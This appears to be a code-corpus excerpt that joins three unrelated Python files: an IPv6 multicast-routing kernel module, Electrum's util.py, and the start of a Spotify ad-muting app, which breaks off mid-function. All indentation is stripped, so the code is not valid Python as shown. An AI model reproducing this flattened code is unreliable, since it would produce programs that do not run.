os.system("ip -6 mrule add oif {} lookup {}".format(interface_name, pim_globals.MULTICAST_TABLE_ID))
with self.rwlock.genWlock():
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_ADD_MIF, struct_mrt_add_vif)
self.vif_index_to_name_dic[index] = interface_name
self.vif_name_to_index_dic[interface_name] = index
for source_dict in list(self.routing.values()):
for kernel_entry in list(source_dict.values()):
kernel_entry.new_interface(index)
self.interface_logger.debug('Create virtual interface: %s -> %d', interface_name, index)
return index
def remove_virtual_interface(self, interface_name):
# with self.interface_lock:
mif_index = self.vif_name_to_index_dic.pop(interface_name, None)
interface_name = self.vif_index_to_name_dic.pop(mif_index)
physical_if_index = if_nametoindex(interface_name)
struct_vifctl = struct.pack("HBBHI", mif_index, 0, 0, physical_if_index, 0)
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_DEL_MIF, struct_vifctl)
os.system("ip -6 mrule del iif {}".format(interface_name))
os.system("ip -6 mrule del oif {}".format(interface_name))
# alterar MFC's para colocar a 0 esta interface
with self.rwlock.genWlock():
for source_dict in list(self.routing.values()):
for kernel_entry in list(source_dict.values()):
kernel_entry.remove_interface(mif_index)
self.interface_logger.debug('Remove virtual interface: %s -> %d', interface_name, mif_index)
'''
/* Cache manipulation structures for mrouted and PIMd */
typedef __u32 if_mask;
typedef struct if_set {
if_mask ifs_bits[__KERNEL_DIV_ROUND_UP(IF_SETSIZE, NIFBITS)];
} if_set;
struct mf6cctl {
struct sockaddr_in6 mf6cc_origin; /* Origin of mcast */
struct sockaddr_in6 mf6cc_mcastgrp; /* Group in question */
mifi_t mf6cc_parent; /* Where it arrived */
struct if_set mf6cc_ifset; /* Where it is going */
};
'''
def set_multicast_route(self, kernel_entry: KernelEntry):
source_ip = socket.inet_pton(socket.AF_INET6, kernel_entry.source_ip)
sockaddr_in6_source = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, source_ip, 0)
group_ip = socket.inet_pton(socket.AF_INET6, kernel_entry.group_ip)
sockaddr_in6_group = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, group_ip, 0)
outbound_interfaces = kernel_entry.get_outbound_interfaces_indexes()
if len(outbound_interfaces) != 8:
raise Exception
# outbound_interfaces_and_other_parameters = list(kernel_entry.outbound_interfaces) + [0]*4
# outbound_interfaces_and_other_parameters = outbound_interfaces + [0]*4
outgoing_interface_list = outbound_interfaces
# outbound_interfaces, 0, 0, 0, 0 <- only works with python>=3.5
# struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces, 0, 0, 0, 0)
struct_mf6cctl = struct.pack("28s 28s H " + "I" * 8, sockaddr_in6_source, sockaddr_in6_group,
kernel_entry.inbound_interface_index,
*outgoing_interface_list)
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_ADD_MFC, struct_mf6cctl)
def set_flood_multicast_route(self, source_ip, group_ip, inbound_interface_index):
source_ip = socket.inet_pton(socket.AF_INET6, source_ip)
sockaddr_in6_source = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, source_ip, 0)
group_ip = socket.inet_pton(socket.AF_INET6, group_ip)
sockaddr_in6_group = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, group_ip, 0)
outbound_interfaces = [255] * 8
outbound_interfaces[inbound_interface_index // 32] = 0xFFFFFFFF & ~(1 << (inbound_interface_index % 32))
# outbound_interfaces, 0, 0, 0, 0 <- only works with python>=3.5
# struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces, 0, 0, 0, 0)
# struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces_and_other_parameters)
struct_mf6cctl = struct.pack("28s 28s H " + "I" * 8, sockaddr_in6_source, sockaddr_in6_group,
inbound_interface_index, *outbound_interfaces)
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_ADD_MFC, struct_mf6cctl)
def remove_multicast_route(self, kernel_entry: KernelEntry):
source_ip = socket.inet_pton(socket.AF_INET6, kernel_entry.source_ip)
sockaddr_in6_source = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, source_ip, 0)
group_ip = socket.inet_pton(socket.AF_INET6, kernel_entry.group_ip)
sockaddr_in6_group = struct.pack("H H I 16s I", socket.AF_INET6, 0, 0, group_ip, 0)
outbound_interfaces = [0] * 8
# struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, *outbound_interfaces_and_other_parameters)
struct_mf6cctl = struct.pack("28s 28s H " + "I" * 8, sockaddr_in6_source, sockaddr_in6_group, 0,
*outbound_interfaces)
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_DEL_MFC, struct_mf6cctl)
self.routing[kernel_entry.source_ip].pop(kernel_entry.group_ip)
if len(self.routing[kernel_entry.source_ip]) == 0:
self.routing.pop(kernel_entry.source_ip)
def exit(self):
self.running = False
# MRT DONE
self.socket.setsockopt(socket.IPPROTO_IPV6, self.MRT6_DONE, 1)
self.socket.close()
'''
/*
* Structure used to communicate from kernel to multicast router.
* We'll overlay the structure onto an MLD header (not an IPv6 heder like igmpmsg{}
* used for IPv4 implementation). This is because this structure will be passed via an
* IPv6 raw socket, on which an application will only receiver the payload i.e the data after
* the IPv6 header and all the extension headers. (See section 3 of RFC 3542)
*/
struct mrt6msg {
__u8 im6_mbz; /* must be zero */
__u8 im6_msgtype; /* what type of message */
__u16 im6_mif; /* mif rec'd on */
__u32 im6_pad; /* padding for 64 bit arch */
struct in6_addr im6_src, im6_dst;
};
/* ip6mr netlink cache report attributes */
enum {
IP6MRA_CREPORT_UNSPEC,
IP6MRA_CREPORT_MSGTYPE,
IP6MRA_CREPORT_MIF_ID,
IP6MRA_CREPORT_SRC_ADDR,
IP6MRA_CREPORT_DST_ADDR,
IP6MRA_CREPORT_PKT,
__IP6MRA_CREPORT_MAX
};
'''
def handler(self):
while self.running:
try:
msg = self.socket.recv(500)
if len(msg) < 40:
continue
(im6_mbz, im6_msgtype, im6_mif, _, im6_src, im6_dst) = struct.unpack("B B H I 16s 16s", msg[:40])
# print((im_msgtype, im_mbz, socket.inet_ntoa(im_src), socket.inet_ntoa(im_dst)))
if im6_mbz != 0:
continue
print(im6_mbz)
print(im6_msgtype)
print(im6_mif)
print(socket.inet_ntop(socket.AF_INET6, im6_src))
print(socket.inet_ntop(socket.AF_INET6, im6_dst))
# print((im_msgtype, im_mbz, socket.inet_ntoa(im_src), socket.inet_ntoa(im_dst)))
ip_src = socket.inet_ntop(socket.AF_INET6, im6_src)
ip_dst = socket.inet_ntop(socket.AF_INET6, im6_dst)
if im6_msgtype == self.MRT6MSG_NOCACHE:
print("MRT6 NO CACHE")
self.msg_nocache_handler(ip_src, ip_dst, im6_mif)
elif im6_msgtype == self.MRT6MSG_WRONGMIF:
print("WRONG MIF HANDLER")
self.msg_wrongvif_handler(ip_src, ip_dst, im6_mif)
# elif im_msgtype == Kernel.IGMPMSG_WHOLEPKT:
# print("IGMP_WHOLEPKT")
# self.igmpmsg_wholepacket_handler(ip_src, ip_dst)
else:
raise Exception
except Exception:
traceback.print_exc()
continue
# receive multicast (S,G) packet and multicast routing table has no (S,G) entry
def msg_nocache_handler(self, ip_src, ip_dst, iif):
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg(iif)
# receive multicast (S,G) packet in a outbound_interface
def msg_wrongvif_handler(self, ip_src, ip_dst, iif):
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg(iif)
''' useless in PIM-DM... useful in PIM-SM
def msg_wholepacket_handler(self, ip_src, ip_dst):
#kernel_entry = self.routing[(ip_src, ip_dst)]
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg()
#kernel_entry.recv_data_msg(iif)
'''
@staticmethod
def _get_kernel_entry_interface():
return KernelEntry6Interface
def _create_pim_interface_object(self, interface_name, index, state_refresh_capable):
return InterfacePim6(interface_name, index, state_refresh_capable)
def _create_membership_interface_object(self, interface_name, index):
return InterfaceMLD(interface_name, index)
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTC':8, 'mBTC':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['BTC', 'mBTC', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain/',
{'tx': 'transactions/', 'addr': 'addresses/'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp/',
{'tx': 'Transaction/', 'addr': 'Address/'}),
'Blockchain.info': ('https://blockchain.info/',
{'tx': 'tx/', 'addr': 'address/'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockr.io': ('https://btc.blockr.io/',
{'tx': 'tx/info/', 'addr': 'address/info/'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'BTC.com': ('https://chain.btc.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'Chain.so': ('https://www.chain.so/',
{'tx': 'tx/BTC/', 'addr': 'address/BTC/'}),
'Insight.is': ('https://insight.bitpay.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain/',
{'tx': 'tx/', 'addr': 'address/'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockchair.com': ('https://blockchair.com/bitcoin/',
{'tx': 'transaction/', 'addr': 'address/'}),
'blockonomics.co': ('https://www.blockonomics.co/',
{'tx': 'api/tx?txid=', 'addr': '#/search?q='}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise Exception("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
|
mutefy.py
|
import os
import tkinter as tk
from tkinter import filedialog
import psutil
import pygetwindow as gw
import spotipy
import spotipy.util as util
import time
from pycaw.pycaw import AudioUtilities
from threading import Thread
import random
from pygame import mixer
username = 'Client Username Here'
cid = 'Client ID Here'
secret = 'Client Secret ID Here'
accessscope='user-read-currently-playing user-modify-playback-state'
redirectURI='Your redirectURI'
def setupobj(username,scope,clientid,clientsecret,redirect_uri):
token = util.prompt_for_user_token(username,scope,clientid,clientsecret,redirect_uri)
return spotipy.Spotify(auth=token)
def openspotify():
try:
if 'Spotify' in (p.name() for p in psutil.process_iter()):
s = gw.getWindowsWithTitle('Spotify')[0]
s.activate()
else:
os.system("Spotify")
except:
tk.messagebox.showinfo("Welcome to Mutefy", "Spotify is not installed! Please install Spotify!")
def checkads():
global sobj
sts.set("Running!")
txt.config(fg='green')
try:
trackInfo = sobj.current_user_playing_track()
except:
print('Token Expired!')
sobj = setupobj(username,accessscope,cid,secret,redirectURI)
trackInfo = sobj.current_user_playing_track()
try:
if trackInfo['currently_playing_type'] == 'ad':
mutefy(True)
global flag
if flag:
playmusic()
flag=False
else:
mixer.music.pause()
flag=True
mutefy(False)
except TypeError:
pass
mixer.init()
def playmusic():
try:
mixer.music.load(file)
mixer.music.set_volume(0.7)
mixer.music.play()
except:
pass
def mutefy(mute):
sessions = AudioUtilities.GetAllSessions()
for session in sessions:
vol = session.SimpleAudioVolume
if session.Process and session.Process.name() == 'Spotify.exe':
if mute:
vol.SetMute(1,None)
else:
vol.SetMute(0,None)
def threading():
t1=Thread(target=work)
t1.start()
def supdate():
ct=gettrack()
ca=getartist()
calbum=getalbum()
tracks.set(ct)
artist.set(ca)
album.set(calbum)
win.update()
def work():
global flag
flag=True
while True:
